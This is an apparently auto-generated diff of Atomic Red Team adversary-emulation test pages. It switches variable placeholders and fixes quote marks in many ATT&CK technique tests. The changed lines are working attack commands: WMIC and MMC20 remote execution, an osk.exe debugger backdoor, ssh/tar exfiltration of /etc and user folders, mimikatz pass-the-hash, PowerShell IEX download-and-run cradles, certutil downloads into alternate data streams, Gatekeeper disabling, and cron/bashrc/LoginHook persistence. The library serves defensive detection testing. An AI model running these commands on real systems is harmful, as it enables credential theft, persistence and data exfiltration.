Generate docs from job=validate_atomics_generate_docs branch=master

atomics/T1028/T1028.md

@@ -59,7 +59,7 @@ https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-applicatio
 
 #### Run it with `command_prompt`!
 ```
-powershell.exe [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","${computername}")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7")
+powershell.exe [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7")
 ```
 <br/>
 <br/>
@@ -79,7 +79,7 @@ Utilize WMIC to start remote process
 
 #### Run it with `command_prompt`!
 ```
-wmic /user:${user_name} /password:${password} /node:${computer_name} process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"
+wmic /user:#{user_name} /password:#{password} /node:#{computer_name} process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"
 ```
 <br/>
 <br/>
@@ -118,6 +118,6 @@ Execute Invoke-command on remote host
 
 #### Run it with `powershell`!
 ```
-invoke-command -computername #{host_name} -scriptblock {#{remote_command}}
+invoke-command -computer_name #{host_name} -scriptblock {#{remote_command}}
 ```
 <br/>

atomics/T1033/T1033.md

@@ -46,12 +46,12 @@ Identify System owner or users on an endpoint
 ```
 cmd.exe /C whoami
 wmic useraccount get /ALL
-quser /SERVER:"${computername}"
+quser /SERVER:"#{computer_name}"
 quser
-qwinsta.exe" /server:${computername}
+qwinsta.exe" /server:#{computer_name}
 qwinsta.exe
-for /F “tokens=1,2” %i in (‘qwinsta /server:${computername} ^| findstr “Active Disc”‘) do @echo %i | find /v “#” | find /v “console” || echo %j > usernames.txt
-@FOR /F %n in (computers.txt) DO @FOR /F “tokens=1,2” %i in (‘qwinsta /server:%n ^| findstr “Active Disc”’) do @echo %i | find /v “#” | find /v “console” || echo %j > usernames.txt
+for /F "tokens=1,2" %i in ('qwinsta /server:#{computer_name} ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > usernames.txt
+@FOR /F %n in (computers.txt) DO @FOR /F "tokens=1,2" %i in ('qwinsta /server:%n ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > usernames.txt
 ```
 <br/>
 <br/>

atomics/T1048/T1048.md

@@ -38,7 +38,7 @@ Remote to Local
 
 #### Run it with `sh`!
 ```
-ssh ${domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz
+ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz
 ```
 <br/>
 <br/>
@@ -53,7 +53,7 @@ Local to Remote
 
 #### Run it with `sh`!
 ```
-tar czpf - /Users/* | openssl des3 -salt -pass ${password} | ssh ${user_name}@${domain} 'cat > /Users.tar.gz.enc'
+tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@#{domain} 'cat > /Users.tar.gz.enc'
 ```
 <br/>
 <br/>

atomics/T1057/T1057.md

@@ -42,7 +42,7 @@ Utilize ps to identify processes
 
 #### Run it with `sh`!
 ```
-ps >> ${output_file}
-ps aux >> ${output_file}
+ps >> #{output_file}
+ps aux >> #{output_file}
 ```
 <br/>

atomics/T1075/T1075.md

@@ -39,7 +39,7 @@ Note: must dump hashes first
 
 #### Run it with `command_prompt`!
 ```
-mimikatz # sekurlsa::pth /user:${user} /domain:${domain} /ntlm:${ntlm}
+mimikatz # sekurlsa::pth /user:#{user} /domain:#{domain} /ntlm:#{ntlm}
 ```
 <br/>
 <br/>
@@ -52,6 +52,6 @@ Similar to PTH, but attacking Kerberos
 
 #### Run it with `command_prompt`!
 ```
-mimikatz # kerberos::ptt ${username}@${Domain}
+mimikatz # kerberos::ptt #{username}@#{Domain}
 ```
 <br/>

atomics/T1076/T1076.md

@@ -28,7 +28,7 @@ Contributors: Matthew Demaske, Adaptforward</blockquote>
 <br/>
 
 ## Atomic Test #1 - RDP
-RDP hijacking](https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6) — how to hijack RDS and RemoteApp sessions transparently to move through an organization
+RDP hijacking](https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6) - how to hijack RDS and RemoteApp sessions transparently to move through an organization
 
 **Supported Platforms:** Windows
 

atomics/T1086/T1086.md

@@ -58,7 +58,7 @@ Download Mimikatz and dump credentials
 
 #### Run it with `command_prompt`!
 ```
-powershell.exe "IEX (New-Object Net.WebClient).DownloadString('${mimurl}'); Invoke-Mimikatz -DumpCreds"
+powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
 ```
 <br/>
 <br/>
@@ -76,7 +76,7 @@ Download Bloodhound and run it
 
 #### Run it with `command_prompt`!
 ```
-powershell.exe "IEX (New-Object Net.WebClient).DownloadString('${bloodurl}'); Get-BloodHoundData"
+powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{bloodurl}'); Get-BloodHoundData"
 ```
 <br/>
 <br/>
@@ -147,7 +147,7 @@ Using PS 5.1, add a user via CLI
 
 #### Run it with `command_prompt`!
 ```
-New-LocalUser -FullName '${full_name}' -Name '${user_name}' -Password ${password} ‑Description '${description}'
+New-LocalUser -FullName '#{full_name}' -Name '#{user_name}' -Password #{password} -Description '#{description}'
 ```
 <br/>
 <br/>
@@ -167,7 +167,7 @@ Not proxy aware removing cache although does not appear to write to those locati
 
 #### Run it with `powershell`!
 ```
-powershell.exe -exec bypass -windowstyle hidden -noprofile “$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open(‘GET’,’${url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText”
+powershell.exe -exec bypass -windowstyle hidden -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
 ```
 <br/>
 <br/>
@@ -186,7 +186,7 @@ Powershell xml download request
 
 #### Run it with `powershell`!
 ```
-"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -windowstyle hidden -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('${url}');$Xml.command.a.execute | IEX"
+"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -windowstyle hidden -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
 ```
 <br/>
 <br/>
@@ -205,7 +205,7 @@ Powershell invoke mshta to download payload
 
 #### Run it with `powershell`!
 ```
-"C:\Windows\system32\cmd.exe" /c "mshta.exe javascript:a=GetObject("script:${url}").Exec();close()"
+"C:\Windows\system32\cmd.exe" /c "mshta.exe javascript:a=GetObject("script:#{url}").Exec();close()"
 ```
 <br/>
 <br/>

atomics/T1096/T1096.md

@@ -45,14 +45,14 @@ Execute from Alternate Streams
 #### Run it with `command_prompt`!
 ```
 type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
-extrac32 ${path}\procexp.cab ${path}\file.txt:procexp.exe
-findstr /V /L W3AllLov3DonaldTrump ${path}\procexp.exe > ${path}\file.txt:procexp.exe
+extrac32 #{path}\procexp.cab #{path}\file.txt:procexp.exe
+findstr /V /L W3AllLov3DonaldTrump #{path}\procexp.exe > #{path}\file.txt:procexp.exe
 certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
-makecab ${path}\autoruns.exe ${path}\cabtest.txt:autoruns.cab
-print /D:${path}\file.txt:autoruns.exe ${path}\Autoruns.exe
-reg export HKLM\SOFTWARE\Microsoft\Evilreg ${path}\file.txt:evilreg.reg
-regedit /E ${path}\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
-expand \\webdav\folder\file.bat ${path}\file.txt:file.bat
-esentutl.exe /y ${path}\autoruns.exe /d ${path}\file.txt:autoruns.exe /o
+makecab #{path}\autoruns.exe #{path}\cabtest.txt:autoruns.cab
+print /D:#{path}\file.txt:autoruns.exe #{path}\Autoruns.exe
+reg export HKLM\SOFTWARE\Microsoft\Evilreg #{path}\file.txt:evilreg.reg
+regedit /E #{path}\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
+expand \\webdav\folder\file.bat #{path}\file.txt:file.bat
+esentutl.exe /y #{path}\autoruns.exe /d #{path}\file.txt:autoruns.exe /o
 ```
 <br/>

atomics/T1124/T1124.md

@@ -34,7 +34,7 @@ Identify the system time
 
 #### Run it with `command_prompt`!
 ```
-net time \\${computername}
+net time \\#{computername}
 w32tm /tz
 ```
 <br/>

atomics/T1135/T1135.md

@@ -49,8 +49,8 @@ Network Share Discovery
 #### Run it with `sh`!
 ```
 df -aH
-smbutil view -g //${computer_name}
-showmount ${computer_name}
+smbutil view -g //#{computer_name}
+showmount #{computer_name}
 ```
 <br/>
 <br/>

atomics/T1144/T1144.md

@@ -34,7 +34,7 @@ Gatekeeper Bypass via command line
 
 #### Run it with `sh`!
 ```
-sudo xattr -r -d com.apple.quarantine ${app_path}
+sudo xattr -r -d com.apple.quarantine #{app_path}
 sudo spctl --master-disable
 ```
 <br/>

atomics/T1147/T1147.md

@@ -30,6 +30,6 @@ Add a hidden user on MacOS
 
 #### Run it with `sh`!
 ```
-sudo dscl . -create /Users/${user_name} UniqueID 333
+sudo dscl . -create /Users/#{user_name} UniqueID 333
 ```
 <br/>

atomics/T1156/T1156.md

@@ -34,7 +34,7 @@ xxx
 
 #### Run it with `sh`!
 ```
-echo "${script}" >> ~/.bash_profile
-echo "${script}" >> ~/.bashrc
+echo "#{script}" >> ~/.bash_profile
+echo "#{script}" >> ~/.bashrc
 ```
 <br/>

atomics/T1158/T1158.md

@@ -93,7 +93,7 @@ mv file to a .file
 
 #### Run it with `sh`!
 ```
-mv ${filename} .${output_filename}
+mv #{filename} .#{output_filename}
 ```
 <br/>
 <br/>
@@ -106,7 +106,7 @@ Requieres Apple Dev Tools
 
 #### Run it with `sh`!
 ```
-setfile -a V ${filename}
+setfile -a V #{filename}
 ```
 <br/>
 <br/>
@@ -119,7 +119,7 @@ xxx
 
 #### Run it with `sh`!
 ```
-chflags hidden ${filename}
+chflags hidden #{filename}
 ```
 <br/>
 <br/>

atomics/T1164/T1164.md

@@ -55,7 +55,7 @@ Mac Defaults
 
 #### Run it with `sh`!
 ```
-sudo defaults write com.apple.loginwindow LoginHook ${script}
+sudo defaults write com.apple.loginwindow LoginHook #{script}
 sudo defaults delete com.apple.loginwindow LoginHook
 ```
 <br/>

atomics/T1165/T1165.md

@@ -51,7 +51,7 @@ Establish persistence via a rule run by emond daemon at startup, based on https:
 
 #### Run it with `sh`!
 ```
-sudo cp "${plist}" /etc/emond.d/rules/T1165_emond.plist
+sudo cp "#{plist}" /etc/emond.d/rules/T1165_emond.plist
 sudo touch /private/var/db/emondClients/T1165
 #Clean up
 sudo rm /etc/emond.d/rules/T1165_emond.plist

atomics/T1168/T1168.md

@@ -48,7 +48,7 @@ TODO
 
 #### Run it with `sh`!
 ```
-echo "* * * * * ${script}" > /tmp/persistevil && crontab /tmp/persistevil
+echo "* * * * * #{script}" > /tmp/persistevil && crontab /tmp/persistevil
 ```
 <br/>
 <br/>

atomics/T1173/T1173.md

@@ -40,7 +40,7 @@ Insert tab -> Quick Parts -> Field
 
 Choose = (Formula) and click ok.
 
-After that, you should see a Field inserted in the document with an error “!Unexpected End of Formula”, right-click the Field, and choose Toggle Field Codes.
+After that, you should see a Field inserted in the document with an error "!Unexpected End of Formula", right-click the Field, and choose Toggle Field Codes.
 
 The Field Code should now be displayed, change it to Contain the following:
 

atomics/T1176/T1176.md

@@ -76,4 +76,5 @@ click "Load Temporary Add-on"
 
 3. Then click 'Open'
 
+
 <br/>

atomics/T1202/T1202.md

@@ -42,9 +42,9 @@ The Program Compatibility Assistant (pcalua.exe) may invoke the execution of pro
 
 #### Run it with `command_prompt`!
 ```
-pcalua.exe -a ${process}
-pcalua.exe -a ${payload_path}
-pcalua.exe -a ${payload_cpl_path}
+pcalua.exe -a #{process}
+pcalua.exe -a #{payload_path}
+pcalua.exe -a #{payload_cpl_path}
 ```
 <br/>
 <br/>
@@ -66,7 +66,7 @@ forfiles.exe may invoke the execution of programs and commands from a Command-Li
 
 #### Run it with `command_prompt`!
 ```
-forfiles /p c:\windows\system32 /m notepad.exe /c ${process}
+forfiles /p c:\windows\system32 /m notepad.exe /c #{process}
 forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe"
 ```
 <br/>